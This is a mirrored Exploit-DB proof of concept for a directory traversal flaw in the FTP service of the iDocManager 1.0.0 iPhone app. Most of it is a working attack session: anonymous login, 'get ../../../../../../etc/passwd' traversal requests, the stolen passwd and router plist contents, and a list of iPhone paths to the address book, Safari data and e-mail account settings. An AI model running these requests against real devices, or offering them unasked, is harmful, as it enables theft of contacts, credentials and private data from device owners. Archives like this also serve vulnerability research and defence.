bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ios/remote/16228.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

80 lines
No EOL
2.8 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: iDocManager v1.0.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/idocmanager/id376421606?mt=8
# Version: 1.0.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the iDocManager.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 20000
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.
226 Transfer complete.
ftp: 4 bytes received in 0.02Seconds 0.25Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.02Seconds 49.19Kbytes/sec.
ftp> get ../../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
221- Data traffic for this session was 0 bytes in 0 files
221 Thank you for using the FTP service on localhost.
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>
# IPhone inside information
1. Phone Book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
2. Safari Favorites List
- /private/var/mobile/Library/Safari
3. Users E-mail Information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
4. IPv4 Router Information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist
Reference in a new issue View git blame Copy permalink